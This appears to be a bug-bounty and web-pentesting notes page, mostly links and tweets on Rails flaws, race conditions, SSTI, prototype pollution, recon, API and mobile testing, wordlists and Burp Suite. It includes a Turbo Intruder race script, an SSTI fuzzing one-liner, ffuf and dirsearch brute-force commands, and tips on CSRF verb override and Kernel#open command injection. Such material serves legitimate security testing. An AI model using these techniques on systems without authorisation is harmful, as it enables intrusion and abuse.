{% embed url="<https://twitter.com/FaniMalikHack/status/1395042756108505092?s=20>" %}

2FA - <https://mazoka777.medium.com/two-factor-authentication-bypass-4c814627f8c3>

{% embed url="<https://github.com/aufzayed/bugbounty/tree/main/403-bypass>" %}


# Ruby on Rails

**Blogs / Articles / Writeups / Presentations:**

* <https://hackerone.com/reports/134321>
* [Airbnb - Ruby on Rails String Interpolation led to Remote Code Executionbuer.haus](https://buer.haus/2017/03/13/airbnb-ruby-on-rails-string-interpolation-led-to-remote-code-execution/)
* <https://rhys.io/post/rce-in-ruby-using-mustache-templates>
* <https://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/>
* <https://chybeta.github.io/2019/03/16/Analysis-for%E3%80%90CVE-2019-5418%E3%80%91File-Content-Disclosure-on-Rails/>
* <https://t.co/XmASzMEMAb?amp=1>
* <https://edoverflow.com/2017/ruby-resolv-bug/>
* <https://www.slideshare.net/Railwaymen_org/ror-workshop-web-applications-hacking-ruby-on-rails-example>
* <https://twitter.com/_devalias/status/1194461246394753025>
* <https://blog.heroku.com/rails-asset-pipeline-vulnerability#:~:text=Released%20in%20CVE%2D2018%2D3760,set%20to%20compile%20at%20runtime.&text=If%20Sprockets%20can't%20find,asset%20that%20matches%20the%20request.>

**Cheatsheet:**

* <https://github.com/brunofacca/zen-rails-security-checklist>
* <https://github.com/edwardqiu/awesome-rails-security>

**Labs:**

* <https://twitter.com/PentesterLab/status/1174476446376398848>[h ](https://towardsdatascience.com/building-a-vulnerable-rails-application-for-learning-2a1de8cf98d5)
* <https://towardsdatascience.com/building-a-vulnerable-rails-application-for-learning-2a1de8cf98d5>

**Twitter Threads:**

* <https://twitter.com/orange_8361/status/817658441598574592>
* <https://twitter.com/chybeta/status/1106752671057395712>
* <https://twitter.com/_devalias/status/1173806552723050497>
* <https://twitter.com/_ayoubfathi_/status/1108341801193213952>
* <https://twitter.com/intigriti/status/1177178910397796353>
* <https://twitter.com/ph0rensic/status/1151640168417374208>
* <https://twitter.com/Wh11teW0lf/status/1062043483786149888>
* <https://twitter.com/search?q=CVE-2019-5418&src=typed_query>
* <https://twitter.com/s0md3v/status/1177183347887312897>
* <https://twitter.com/Wesecureapp_RD/status/1171726890857459712>
* [When auditing Ruby on Rails apps, always search for .js.erb views files. There is a stupid pattern called "Server-generated JavaScript Responses" which is a way to bypass SOP and inject content via JavaScript files (just like JSONP) which leads to XSSI.](https://twitter.com/lean0x2f/status/1205335920507006977)
* [CSRF using PUT , DELETE is possible in ruby on rails frameworks if you see a hidden field called \_method in the request (if it dont exist try to add it) set its value to PUT or DELETE and then submit a GET or POST request it will override the HTTP Verb and success the attack .](https://twitter.com/secmind009/status/1205669730331373568)
* [API TIP: 4/31- Testing a Ruby on Rails App & noticed an HTTP parameter containing a URL? Developers sometimes use "Kernel#open" function to access URLs == Game Over. Just send a pipe as the first character and then a shell command (Command Injection by design)](https://twitter.com/traceableai/status/1213495503981305858)
* <https://twitter.com/m4ll0k2/status/1112119619396030466>
* <https://github.com/mpgn/CVE-2019-5418>


# Mass Assginment

![](/files/-Mkzg3yAHm3K3IU6NPtl)


# S3 Bucket

**Tools:**

* <https://github.com/cr0hn/festin>
* <https://github.com/smaranchand/bucky>


# Race Condition

* <https://lab.wallarm.com/race-condition-in-web-applications/>
* <https://medium.com/@corneacristian/top-25-race-condition-bug-bounty-reports-84f9073bf9e5>
* <https://twitter.com/fuxksniper/status/1295229826018598913>
* <https://pandaonair.com/2020/06/11/race-conditions-exploring-the-possibilities.html>
*

```
a Python Snippet to try Race Condition weakness in Turbo Intruder
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=10,
                           pipeline=False
                           )

    for i in range(30):
        engine.queue(target.req, str(i), gate='race1')

    engine.openGate('race1')

    engine.complete(timeout=60)


def handleResponse(req, interesting):
    table.add(req)
```

* <https://0xdekster.medium.com/second-order-race-condition-be8aaf774783>
* <https://blog.projectdiscovery.io/exploiting-race-conditons/>


# CRLF

* <https://github.com/dwisiswant0/crlfuzz>

![](/files/-Mj80mEJPZM_4RvLLlF3)


# SSTI

[Got RCE in 2 minutes via SSTI, \~waybackurls http://target.com | qsreplace "daman{{9\*9}}" > fuzz.txt \~ffuf -u FUZZ -w fuzz.txt -replay-proxy http://127.0.0.1:8080/ (captured requests in burp) searched: daman81 in burp, got 43 results from 1266 requests, noiicee](https://twitter.com/MrDamanSingh/status/1317042176337932291?s=20)

![](/files/-MWELgz3ZctAOGTgNgZi)

{% embed url="<https://gosecure.github.io/template-injection-workshop/#0>" %}

{% embed url="<https://twitter.com/alamlearnN/status/1441946293824196612?s=20>" %}

{% embed url="<https://twitter.com/luca_dd7/status/1407352653793923074?s=20>" %}


# Prototype Pollution

* I created this basic chrome extension to find prototype pollution. You won't believe the applications where PP exist, it's everywhere. I hope you make internet pollution free :xD. [https://github.com/msrkp/PPScan](https://t.co/5oO65WBTYC?amp=1)

{% embed url="<https://twitter.com/po6ix/status/1288306303958265856>" %}

Prototype Pollution an underrated vulnerability: [https://portswigger.net/daily-swig/prototype-pollution-the-dangerous-and-underrated-vulnerability-impacting-javascript-applications…](https://t.co/siMjL7ibaQ?amp=1) [https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/…](https://t.co/s5stCdqziL?amp=1) Client Side Protype Pollution Scanner: [https://github.com/msrkp/PPScan](https://t.co/4vdybeHceD?amp=1) AST Injection, Prototype Pollution to RCE: [https://blog.p6.is/AST-Injection/](https://t.co/AFiFbnpEBr?amp=1) [#BugBountyTip](https://twitter.com/hashtag/BugBountyTip?src=hashtag_click) [#Hacking](https://twitter.com/hashtag/Hacking?src=hashtag_click) [#Pentesting](https://twitter.com/hashtag/Pentesting?src=hashtag_click)[@debangshu\_kundu](https://twitter.com/debangshu_kundu)

{% embed url="<https://twitter.com/divadbate/status/1421817686338809856?s=20>" %}

{% embed url="<https://twitter.com/intigriti/status/1429765380017373188?s=20>" %}

{% embed url="<https://labs.detectify.com/2021/06/08/what-is-a-prototype-pollution-vulnerability-and-how-does-page-fetch-help/>" %}


# Approach

* Recon
* Sub Domain
* Public Exploits
* Assest Discovery
* Google Search
* Censys

  * censys.io
    * Look for SSL certificates
      * `443.https.tls.certificate.parsed.extensions.subject_alt_name.dns_name:bugcrowd.com`
    * Look for Internal certificates
      * `"COMPANY" + internal (get creative)`\
        \=> might allow you to find a company internal subdomain or IP address not mentioned anywhere
* Shodan
* Web Archive
* Sensitive info from public resources - github, gist, pastebin , Trello , google sites , google groups , prezi , scribd , slideshare , online IDE's , github wiki , Graffana , zookeeper
* Trello - <https://www.freecodecamp.org/news/discovering-the-hidden-mine-of-credentials-and-sensitive-information-8e5ccfef2724/>
* <https://twitter.com/imhaxormad/status/1118289299152072706>
* OSINT - <https://twitter.com/payloadartist/status/1066641639534297088>
* Javascript Recon / Client Side Recon
* Reverse DNS / Whois
* Virtual Host <https://twitter.com/HusseiN98D/status/1158503813399142401>
* Retrive HTTP Status - <https://twitter.com/HusseiN98D/status/1159912979695116293>
* Broken link hijacking
* Reffere Header Check
* Rate Limiting
* BFAC - BFAC (Backup File Artifacts Checker): An automated tool that checks for backup artifacts that may disclose the web-application's source code. - <https://github.com/mazen160/bfac>
* Bruteforce GET / POST methods
* Vhost bruteforcing
* vhost 0 <https://twitter.com/nnwakelam/status/1114122122534641664>
* vhost - <https://twitter.com/rez0__/status/1254588390114287617>

  [Use ffuf for vhosting on every new domain to find hidden servers/admin panels: ffuf -c -u https://target .com -H “Host: FUZZ” -w vhost\_wordlist.txt #BugBountyTips #BugBountyTip #BugBounty](https://twitter.com/rez0__/status/1254588390114287617)
* content discovery - For Content Discovery : [gau](https://github.com/lc/gau), [Paramspider](https://github.com/devanshbatham/ParamSpider), [Waybackurl](https://github.com/tomnomnom/waybackurls), httpx, Subfinder, [sublist3r,](https://github.com/aboul3la/Sublist3r)
* urlscan.io\
  Get directory and files from[@urlscanio](https://twitter.com/urlscanio) public scans for fun & profit url(){ gron "[https://urlscan.io/api/v1/search/?q=domain:$1…](https://t.co/O4Fu4MIrQQ?amp=1)" | grep 'url' | gron --ungron } [$source](https://twitter.com/search?q=%24source\&src=cashtag_click) .bash\_profile [$url](https://twitter.com/search?q=%24url\&src=cashtag_click) [http://target.com](https://t.co/t98T7KNObr?amp=1) Make sure you have[@TomNomNom](https://twitter.com/TomNomNom) gron installed​


# API Security

**Blogs / Articles / Presentations:**

* [https://speakerdeck.com/riyazwalikar/api-security-testing-null-bangalore-janua](https://speakerdeck.com/riyazwalikar/api-security-testing-null-bangalore-january-2020)
* <https://medium.com/@inonst/31-tips-api-security-pentesting-480b5998b765>
* <https://medium.com/bugbountywriteup/bounty-tip-easiest-way-to-bypass-apis-rate-limit-f984fad40093>
* <https://bendtheory.medium.com/finding-and-exploiting-unintended-functionality-in-main-web-app-apis-6eca3ef000af>
* <https://labs.detectify.com/2021/08/31/go-fuzz-yourself-how-to-find-more-vulnerabilities-in-apis-through-fuzzing-whitepaper-download/>

**Writeups:**

* <https://drive.google.com/file/d/1iMGqUUpaiQrEys4IOETwgxti8AiShomZ/view>

**Checklist:**

* <https://github.com/shieldfy/API-Security-Checklist>
* <https://hackanythingfor.blogspot.com/2020/07/api-testing-checklist.html?spref=tw>

**Videos:**

* <https://www.youtube.com/watch?v=gx-eKashKvs&feature=youtu.be>
* <https://www.youtube.com/watch?v=qqmyAxfGV9c&feature=youtu.be>

Tools:

* <https://github.com/ngalongc/openapi_security_scanner>

Tweets:

{% embed url="<https://twitter.com/alra3ees/status/1104694901655126016?s=21>" %}

{% embed url="<https://twitter.com/alra3ees/status/1104695017346662400?lang=en>" %}

{% embed url="<https://twitter.com/alra3ees/status/1104695017346662400?s=21>" %}

{% embed url="<https://twitter.com/ofjaaah/status/1367465923465142272?s=20>" %}

* <https://github.com/dwisiswant0/apkleaks>
*

{% embed url="<https://dsopas.github.io/MindAPI/play/#download-interactive>" %}

[<br>](https://twitter.com/akita_zen/status/1131652331471347712/photo/2)

![](/files/-MkpJMwJiC_K6e6TKfqB)

{% embed url="<https://twitter.com/newfolderj/status/1404712486394343425?s=20>" %}

{% embed url="<https://twitter.com/InsiderPhD/status/1269282904653418497?s=20>" %}


# Mobile Security

Android Application Security Series (Part 1 - 26) : [https://goo.gl/Tcp8fX](https://t.co/w5GhvSu1A5?amp=1)

* <https://github.com/sh4hin/MobileApp-Pentest-Cheatsheet>
* <https://blog.securitybreached.org/2020/03/17/getting-started-in-android-apps-pentesting/>
* <https://manifestsecurity.com/android-application-security/>
* <https://github.com/anantshri/Android_Security>
* <https://www.hackerone.com/blog/androidhackingmonth-intro-to-android-hacking>
* <https://blog.softwaroid.com/2020/05/02/android-application-penetration-testing-bug-bounty-checklist/>
* ios - <https://mobexler.com/checklist.htm>
* <https://github.com/B3nac/Android-Reports-and-Resources>
* <https://guides.peruzal.com/mobile-device-security-and-penetration-testing-guide/>
* <https://payatu.com/blog/abhilashnigam/ios-pentesing-guide-from-a-n00bs-perspective.1>
* <https://co0nan.gitbook.io/writeups/>

From my tweets :

SANS VIDEO - "How To" Install & Configure Android Emulator by[@joswr1ght](https://twitter.com/joswr1ght) YouTube: [https://youtu.be/ij2Y3dwLdwA](https://t.co/gWKQ1JEvtv?amp=1) - <https://twitter.com/SANSInstitute/status/624973702380285952>

* Android Application Security Series (Part 1 - 26) : [https://goo.gl/Tcp8fX](https://t.co/w5GhvSu1A5?amp=1)

* MobileApp-Pentest-Cheatsheet : High value information on specific mobile application penetration testing : - <https://twitter.com/binitamshah/status/777156946457571328>

* <https://twitter.com/timstrazz/status/886342537253855232>

* Complete [#Android](https://twitter.com/hashtag/Android?src=hashtag_click) app [#security](https://twitter.com/hashtag/security?src=hashtag_click) checklist, with links to testing instructions and best practices [http://goo.gl/Zq4VzP](https://t.co/WH44Ouh8ix?amp=1)

* An interesting write-up of how pwning a mobile device led to Domain compromise. From APK to Golden Ticket:[![](https://pbs.twimg.com/card_img/1280046219855892482/K6dkDzHG?format=jpg\&name=small)](https://t.co/fykk6IXEZD?amp=1)[From APK to Golden TicketFrom APK to Golden Ticket Owning an Android smartphone and gaining Domain Admin rights and more... Andrea Pierini , Giuseppe Trotta February 24, 2017 This article describes the potential dangers of...docs.google.com](https://t.co/fykk6IXEZD?amp=1)

* I'm releasing all the slides (\~800!) of my Mobile Security class: [https://mobisec.reyammer.io](https://t.co/TAAnBMCBqB?amp=1)! They are not perfect, but students learned how to reverse apps, find\&exploit real-world bugs, reason about threat modelling / system security, etc. Very proud of them :-) =><https://twitter.com/reyammer/status/1102636136541966339>

* MOBILE PENTESTING CONTENTS : [https://nileshsapariya.blogspot.com/2016/11/zero-to-hero-mobile-application-testing.html…](https://t.co/Rn8jvpo0h1?amp=1) [https://manifestsecurity.com](https://t.co/fWVDnB0Qyk?amp=1) [https://github.com/sh4hin/MobileApp-Pentest-Cheatsheet…](https://t.co/ATwBfF55Qa?amp=1) [https://github.com/tanprathan/MobileApp-PentestCheatsheet/blob/master/README.md…](https://t.co/a8RK0qqH2Y?amp=1) [https://gbhackers.com/penetration-testing-android-application-checklist/…](https://t.co/ZohcF1Q0Ex?amp=1) [https://gbhackers.com/android-application-penetration-testing/…](https://t.co/XOwWIueAi2?amp=1) [https://secvibe.com/intercepting-android-traffic-for-mobile-appsec-2ba634995f6f…](https://t.co/QavOHmCRja?amp=1) [https://secvibe.com/android-appsec-27855dca8531…](https://t.co/pSnwec9CQd?amp=1)\
  <https://twitter.com/vasim_infosec/status/1174320971966058496>

* Today I am releasing the Mobile Application pentesting Resources : [https://docs.google.com/document/d/1\_c5VcgiyOIrTl2E5M1gU\_EAb-4piONqQEh4PSw4NUL4/edit?usp=sharing…](https://t.co/h9uWyxHvKP?amp=1) Please share your valuable feedback [#MobileApp](https://twitter.com/hashtag/MobileApp?src=hashtag_click) [#infosec](https://twitter.com/hashtag/infosec?src=hashtag_click) [#pentest](https://twitter.com/hashtag/pentest?src=hashtag_click) [#bugbounty](https://twitter.com/hashtag/bugbounty?src=hashtag_click) [#cheatsheet](https://twitter.com/hashtag/cheatsheet?src=hashtag_click) [#resources](https://twitter.com/hashtag/resources?src=hashtag_click) [#Android](https://twitter.com/hashtag/Android?src=hashtag_click) [#ios](https://twitter.com/hashtag/ios?src=hashtag_click)

* <https://github.com/B3nac/Android-Reports-and-Resources>

* [https://mobile-security.gitbook.io/mobile-security-testing-guide](https://mobile-security.gitbook.io/mobile-security-testing-guide/)

* <https://github.com/ashishb/android-security-awesome>

* <https://docs.google.com/presentation/d/1gK2vYdvwFn8r8dSawIWRRIF4yDF4qmMY2qEelS1M7rI/edit#slide=id.g9b88c175c9_0_241>

* <https://ivrodriguez.com/tips-for-mobile-bug-bounty-hunting/>

* <https://medium.com/@hackersdump0>

* <https://github.com/saeidshirazi/awesome-android-security#Checklist>

* <https://www.cobalt.io/blog/getting-started-with-android-application-security>

* <https://medium.com/@srkasthuri/android-pentesting-101-a-novices-handbook-to-getting-started-8f56f877f418>

* <https://www.hackthebox.com/blog/intro-to-mobile-pentesting#what_is_android_penetration_testing_>

* <https://securityboat.net/getting-started-into-android-secuirty/>

* <https://github.com/Anof-cyber/Application-Security>

* <https://github.com/iamsarvagyaa/AndroidSecNotes>

*

{% embed url="<https://twitter.com/imabhisarpandey/status/1434241470635016194?s=20>" %}


# Fuzzing / Wordlists

1. <https://twitter.com/Jhaddix/status/1177706552272142337>
   1. <https://twitter.com/NahamSec/status/1177672652011343873>
2. <https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d>&#x20;
   1. <https://twitter.com/Yassineaboukir/status/1189813564053180416>
3. <https://twitter.com/soaj1664ashar/status/1189570378961739777>
4. <https://twitter.com/s0md3v/status/1190325611215982592>
5. Param Bruteforce -<https://twitter.com/HusseiN98D/status/1166759438503620610> - Arjun
6. Rustbuster - [https://twitter.com/michael\_eder\_/status/1166629786711670784](https://twitter.com/michael_eder_/status/1166629786711670784?ref_src=twsrc%5Etfw%7Ctwcamp%5Eembeddedtimeline%7Ctwterm%5Ecollection%3A1165994575510605826%7Ctwcon%5Etimelinechrome\&ref_url=https%3A%2F%2Ftwitter.com%2Fpentesterland%2Ftimelines%2F1165994575510605826)
7. Check Status Codes - <https://github.com/Sy3Omda/dotfiles/blob/master/fetcher.sh>
8. Robots disallowed - <https://github.com/danielmiessler/RobotsDisallowed>
9. Content Discovery - <https://twitter.com/Alra3ees/status/1208502084246671366> (Also downloaded the same)
10. <https://twitter.com/Random_Robbie/status/1221748816308768770>
11. Dirbuster - When you're brute forcing for endpoints, don't forget to add extensions. You can also use this method to discover backup files. Here's a command I use frequently:

    dirsearch -e php,asp,aspx,jsp,py,txt,conf,config,bak,backup,swp,old,db,sql -u - <https://twitter.com/i/status/1221792235215151104>
12. PathBrute - <https://github.com/milo2012/pathbrute>
13. <https://github.com/enciphers/Wordlists>
14. [Content\_discovery\_nullenc0de.txt](https://gist.github.com/nullenc0de/96fb9e934fc16415fbda2f83f08b28e7#file-content_discovery_nullenc0de-txt)
15. <https://github.com/pwnwiki/webappurls>
16. Status codes - hakul/hakcrawl - gofetch , statusparser
17. What are your normal testing steps when you see a 401? - <https://twitter.com/nomanAli181/status/1146411693590736896>
18. <https://twitter.com/payloadartist/status/1240591694753452032>
19. <https://github.com/deibit/cansina> - web content discovery
20. <https://twitter.com/_harleo/status/1138883725675192322>
21. <https://github.com/phspade/Combined-Wordlists>
22. New dirs to bruteforce -<https://twitter.com/nullenc0de/status/1249804904790732802>
23. <https://twitter.com/imranparray101/status/1141100671581556736?s=20>
24. Jhaddix -&#x20;

{% embed url="<https://twitter.com/Jhaddix/status/1064195192574464000>" %}

Tools -  Fast web fuzzer written in Go - <https://github.com/ffuf/ffuf>

{% embed url="<https://twitter.com/gwendallecoguic/status/1202984025842995200>" %}

When you're brute forcing for endpoints, don't forget to add extensions. You can also use this method to discover backup files. Here's a command I use frequently:

dirsearch -e php,asp,aspx,jsp,py,txt,conf,config,bak,backup,swp,old,db,sql -u&#x20;

{% embed url="<https://twitter.com/hakluke/status/1221792235215151104>" %}

{% embed url="<https://twitter.com/soaj1664ashar/status/1182953904511901696>" %}

{% embed url="<https://twitter.com/soaj1664ashar/status/1184389713941139456>" %}

Thread Related -- <https://twitter.com/search?q=FFuF&src=typed_query>

Any tool to dedupe a list of urls according their parameters? I mean keep only 1 url if it appears several times with same params no matter their values - <https://twitter.com/gwendallecoguic/status/1207435306410168322>

* <https://securityjunky.com/ffuf-on-steroids/>
* <https://github.com/assetnote/commonspeak2-wordlists>
* wordlist by random robbie - <https://gist.github.com/random-robbie/0f9d24a7b3c7268ee0c1ecdbe280611b>
* Subdomain bruteforce list - <https://twitter.com/Alra3ees/status/1068079409117188096>
* FULLL LIST \_ <https://forum.bugcrowd.com/t/dropping-a-cool-wordlist/9211>
* Interesting file extensions to look for: - <https://twitter.com/s0md3v/status/1271241942576185344>
* Check out subs\_all txt here - <https://drive.google.com/file/d/12nABC1GUL7lBsPuzC0pWJrPRzHMHqe8X/view?usp=sharing>
* Tool - wordlistgen
* <https://github.com/Bo0oM/fuzz.txt>
* <https://github.com/epi052/feroxbuster>
* <https://github.com/Droidzzzio/EnumerationList>
* <https://github.com/six2dez/OneListForAll>

{% embed url="<https://twitter.com/s0md3v/status/1271241942576185344>" %}

* <https://github.com/BonJarber/SecUtils/tree/master/clean_wordlist>
* <https://github.com/gh0stkey/Web-Fuzzing-Box>
* <https://github.com/six2dez/OneListForAll>

{% embed url="<https://twitter.com/Alra3ees/status/1301953579675156481?s=20>" %}

{% embed url="<https://twitter.com/Random_Robbie/status/1313772929201692672>" %}

![https://twitter.com/Mah3Sec\_/status/1325030700039368709](/files/-MWEIzcNdlKGT3vcjLQB)

{% embed url="<https://twitter.com/ADITYASHENDE17/status/1359086132911243267?s=20>" %}

{% embed url="<https://twitter.com/m4ll0k/status/1427173323964833793?s=20>" %}

* Huge\_DIR\_wordlist:- <https://github.com/emadshanab/Huge_DIR_wordlist>

Exploiting:

* <https://github.com/ayoubfathi/leaky-paths>

{% embed url="<https://t.co/D7j9jXfinM?amp=1>" %}

{% embed url="<https://twitter.com/Alra3ees/status/1401242508219326466?s=20>" %}

{% embed url="<https://twitter.com/akita_zen/status/1467710656170369029?s=20>" %}


# BugBounty Short Write-ups

{% embed url="<https://twitter.com/HusseiN98D/status/1147864774685974528>" %}

{% embed url="<https://twitter.com/HusseiN98D/status/1155637841541644291>" %}

{% embed url="<https://twitter.com/HusseiN98D/status/1161240273331998720>" %}

{% embed url="<https://twitter.com/HusseiN98D/status/1162123071953821697>" %}

{% embed url="<https://twitter.com/HusseiN98D/status/1165632886218928128>" %}

{% embed url="<https://twitter.com/HusseiN98D/status/1170421494830305280>" %}

{% embed url="<https://twitter.com/pxmme1337/status/1192834638156316672>" %}

{% embed url="<https://twitter.com/Tismayil1/status/1189486500699922432>" %}

{% embed url="<https://twitter.com/Deepak_maxx/status/1182731428410167297>" %}

{% embed url="<https://twitter.com/plenumlab/status/1175061641786011650>" %}

{% embed url="<https://twitter.com/avanish46/status/1176910120183312384>" %}

{% embed url="<https://twitter.com/sonahri501/status/1179253516407382021>" %}

{% embed url="<https://twitter.com/kl_sree/status/1177741873810567169>" %}

{% embed url="<https://twitter.com/sudhanshur705/status/1177173506246602753>" %}

{% embed url="<https://twitter.com/avanish46/status/1174561781680766976>" %}

{% embed url="<https://twitter.com/Cyb3RS3CuR17y/status/1194922699312644097>" %}

{% embed url="<https://twitter.com/Kei0x/status/1173001459652354049>" %}

{% embed url="<https://twitter.com/Kei0x/status/1172665241710276609>" %}

{% embed url="<https://twitter.com/Kei0x/status/1172267556226445313>" %}

{% embed url="<https://twitter.com/Kei0x/status/1171886612218875904>" %}

{% embed url="<https://twitter.com/garthhumphreys/status/1182762563953672197>" %}

{% embed url="<https://twitter.com/SamiDrif/status/1139147479725826053>" %}

{% embed url="<https://twitter.com/pdp/status/1147791251674148864>" %}

{% embed url="<https://twitter.com/M0_SADAT/status/1207713720782270468>" %}

{% embed url="<https://twitter.com/AsadAnw90/status/1208025160923729921>" %}

![https://twitter.com/ElMrhassel/status/1222260273442148353](/files/-Lzk8r1FisMI7ghWbSKj)

[![](https://media.discordapp.net/attachments/672316216102354954/698917529166282852/IMG_20200412_204650.jpg)](https://cdn.discordapp.com/attachments/672316216102354954/698917529166282852/IMG_20200412_204650.jpg)

![](/files/-MC8DmNwkpxh5U7oo2rw)


# Burp Suite Tips and Tricks

* <https://twitter.com/jon_bottarini/status/1140700782343278592> - Match and Replace
  * <https://twitter.com/intigriti/status/1192103070072741894> - Additonal
  * How was i able to access a disabled/hidden feature with the help of burpsuite match and replace feature [#bugbountytip](https://twitter.com/hashtag/bugbountytip?src=hashtag_click) [#bugbounty](https://twitter.com/hashtag/bugbounty?src=hashtag_click)[![](https://pbs.twimg.com/card_img/1281260297723023365/a3pppEif?format=png\&name=medium)](https://t.co/q6O93zv2uu?amp=1)[Getting access to disabled/hidden features with the help of Burp Match and ReplaceA few months ago, During my bug bounty hunting, I came across a Company that lets other developers create API documentation similar to…medium.com](https://t.co/q6O93zv2uu?amp=1)
* <https://twitter.com/Regala_/status/1032563800405360640>  - Find Refernces
* Favourite Plugins - <https://twitter.com/intigriti/status/1093128957921251328>
* <https://twitter.com/trimstray/status/1088019484118528000>
* Burp Hacks - <https://www.youtube.com/watch?v=boHIjDHGmIo>
* <https://twitter.com/trimstray/status/1068095885026955264>
* <https://portswigger.net/research/adapting-burp-extensions-for-tailored-pentesting>
* <https://twitter.com/Gamliel_InfoSec/status/1162126101868679173> -If you see piece of junk information in the Request/Response body, don't forget gonna Proxy > Options tab and![✅](https://abs-0.twimg.com/emoji/v2/svg/2705.svg) "Unpack gzip/deflate in Resp/Req" (by default they aren't marked).
* <https://twitter.com/ranjit_pahan/status/1126191087331053568>
* Favourite plugins - <https://twitter.com/nnwakelam/status/1162453221027307525>
* <https://twitter.com/gwendallecoguic/status/1138383809106391040> - Burp Collaborator
* <https://parsiya.net/blog/2019-10-13-quality-of-life-tips-and-tricks-burp-suite/>
* <https://twitter.com/Dinosn/status/1212706039553908737>
* <https://twitter.com/Agarri_FR/status/1217148102366388226>
* <https://twitter.com/fs0c131y/status/1221717980322631681> - Favourite Extensions
* <https://twitter.com/fasthm00/status/1228118057144537088>
* <https://www.coalfire.com/Solutions/Coalfire-Labs/The-Coalfire-LABS-Blog/june-2018/protips-testing-applications-using-burp-and-more>
* <https://portswigger.net/blog/burps-new-crawler>
* <https://twitter.com/jon_bottarini/status/1140700782343278592>
* <https://twitter.com/Unknownuser1806/status/1225698253867405315> - Extension
* Burp Extensions - <https://twitter.com/search?q=Burp%20Extensions%20%23bugbounty&src=typed_query>
* <https://github.com/elespike/burp-cph>
* <https://vdalabs.com/2020/05/08/burpsuite-extensions-some-favorites/>
* [Are you using @Burp\_Suite with @firefox and don' want see \
  the http://detectportal.firefox.com  requests? Try this steps: https://twitter.com/firefox/status/841843869205598208](https://twitter.com/vahidnameni/status/1031513363476635650)
* <https://portswigger.net/blog/burp-suite-tips-from-power-user-and-hackfluencer-stok>

Just released my first[@Burp\_Suite](https://twitter.com/Burp_Suite) plugin. If you use multiple browsers through burp, check this out:[aurainfosec/burp-multi-browser-highlightingHighlight Burp proxy requests made by different browsers - aurainfosec/burp-multi-browser-highlightinggithub.com](https://t.co/vT3OdoCcMq?amp=1)

Automating Web Apps Input fuzzing via [#Burp](https://twitter.com/hashtag/Burp?src=hashtag_click) Macros [http://blog.securelayer7.net/automating-web-apps-input-fuzzing-via-burp-macros/](https://t.co/I9ICql6YAm?amp=1)

Blog post: Turbo Intruder: Embracing the billion-request attack[![](https://pbs.twimg.com/card_img/1280967443146371073/DG0KUfYJ?format=png\&name=small)](https://t.co/Z1qu1cYAxC?amp=1)[Turbo Intruder: Embracing the billion-request attack | PortSwigger Researchportswigger.net](https://t.co/Z1qu1cYAxC?amp=1)

Need to import multiple URL;s in to burp suite - <https://twitter.com/search?q=parallell%20bugbountytip&src=typed_query>

cat yahoourls.txt| parallel -j 10 curl --proxy <http://127.0.0.1:8080> -sk > /dev/null

[\
![](https://pbs.twimg.com/profile_images/1235840495663722496/1jPPEFB7_reasonably_small.jpg)](https://twitter.com/1m4xx0)[D Ξ Ξ P Λ K ![⚙️](https://abs-0.twimg.com/emoji/v2/svg/2699.svg)@1m4xx0](https://twitter.com/1m4xx0)·[Oct 10, 2019](https://twitter.com/1m4xx0/status/1182007481574146048)One liner to import whole list of subdomains into Burp suite for automated scanning! cat \<file-name> | parallel -j 200 curl -L -o /dev/null {} -x 127.0.0.1:8080 -k -s [#bugbountytips](https://twitter.com/hashtag/bugbountytips?src=hashtag_click) [#bugbounty](https://twitter.com/hashtag/bugbounty?src=hashtag_click) [#bugbountytip](https://twitter.com/hashtag/bugbountytip?src=hashtag_click)

{% embed url="<https://github.com/Static-Flow/BurpSuite-Team-Extension>" %}

* <https://github.com/thegsoinfosec/BurpSuite_payloads>

{% embed url="<https://twitter.com/harshbothra_/status/1299720306777415680?s=20>" %}

{% embed url="<https://twitter.com/tvmpt/status/1179154424708685824>" %}

* [urlgrab --url SITE\_HERE.com --ignore-ssl --proxy socks5://127.0.0.1:8080](https://twitter.com/DevinStokes/status/1280633964147834880?s=20)

{% embed url="<https://twitter.com/Alra3ees/status/1312267528434061312?s=20>" %}

![](/files/-MWEI-xhECOM1fvQSrS9)

* <https://github.com/allyomalley/BurpParamFlagger/>

{% embed url="<https://twitter.com/an0nud4y/status/1441259424526397450?s=20>" %}

{% embed url="<https://twitter.com/codingo_/status/1356023836374757379?s=20>" %}

{% embed url="<https://twitter.com/NahamSec/status/1390027698571939841?s=20>" %}

{% embed url="<https://twitter.com/sillydadddy/status/1392824042042781697?s=20>" %}

{% embed url="<https://twitter.com/codingo_/status/1394276284889370625?s=20>" %}

{% embed url="<https://twitter.com/KathanP19/status/1393193575609892869?s=20>" %}

{% embed url="<https://twitter.com/ADITYASHENDE17/status/1296820434613149697?s=20>" %}

{% embed url="<https://twitter.com/tbbhunter/status/1398350393755701250?s=20>" %}

{% embed url="<https://twitter.com/PortSwigger/status/1400824159073042433?s=20>" %}

* <https://github.com/JGillam/burp-paramalyzer>
* <https://github.com/Hxzeroone/quoted-printable-Parser>


# HackerOne Reports

H1 Total Bugs - <https://docs.google.com/spreadsheets/d/1mfj6InLiXaKvemRimH1wowP4UTe_HExemGajId_JRD8/edit#gid=408095150>

H1 Bug Types - <https://pastebin.com/qmtyiaXp>

Tweet from The Cyber Mentor - <https://twitter.com/thecybermentor/status/1192885324919312385>

```
Account Hijacking
Allocation of Resources Without Limits or Throttling - CWE-770
Array Index Underflow - CWE-129
Authentication Bypass Using an Alternate Path or Channel - CWE-288
Brute Force - CWE-307
Buffer Over-read - CWE-126
Buffer Underflow - CWE-124
Buffer Under-read - CWE-127
Business Logic Errors - CWE-840
Classic Buffer Overflow - CWE-120
Cleartext Storage of Sensitive Information - CWE-312
Cleartext Transmission of Sensitive Information - CWE-319
Client-Side Enforcement of Server-Side Security - CWE-602
Code Injection - CWE-94
Command Injection - Generic - CWE-77
Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') - CWE-362
CRLF Injection - CWE-93
Cross-Site Request Forgery (CSRF) - CWE-352
Cross-site Scripting (XSS) - DOM - CWE-79
Cross-site Scripting (XSS) - Generic - CWE-79
Cross-site Scripting (XSS) - Reflected - CWE-79
Cross-site Scripting (XSS) - Stored - CWE-79
Cryptographic Issues - Generic - CWE-310
Denial of Service- CWE-400
Deserialization of Untrusted Data - CWE-502
Double Free - CWE-415
Download of Code Without Integrity Check - CWE-494
